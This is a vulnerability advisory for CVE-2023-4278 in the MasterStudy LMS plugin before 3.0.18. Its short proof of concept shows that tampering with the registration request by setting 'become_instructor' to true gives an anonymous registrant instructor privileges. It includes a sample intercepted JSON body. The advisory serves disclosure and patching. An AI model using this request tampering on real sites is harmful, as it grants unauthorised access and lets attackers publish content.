MasterStudy LMS < 3.0.18 – Unauthenticated Instructor Account Creation | CVE 2023-4278

Description

The plugin does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and/or posts.

Proof of Concept

1. Visit the Profiles Settings page for the plugin: MS LMS > LMS Settings > Profiles
2. Ensure that "Disable Instructor Registration" and "Disable Instructor Pre-moderation" are both "On". Save settings.
3. On a course page, click "Enroll Course"
4. Register a new user. Intercept the request, ex:

```
{"user_login":"user123","user_email":"user@example.com","user_password":"Password123","user_password_re":"Password123","become_instructor":"true","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":[],"redirect_page":"http://site.com/user-account/"}
```

4. Change the `become_instructor` value to `true`
5. The account will have instructor privileges, allowing them to add new courses and publish blog posts for review.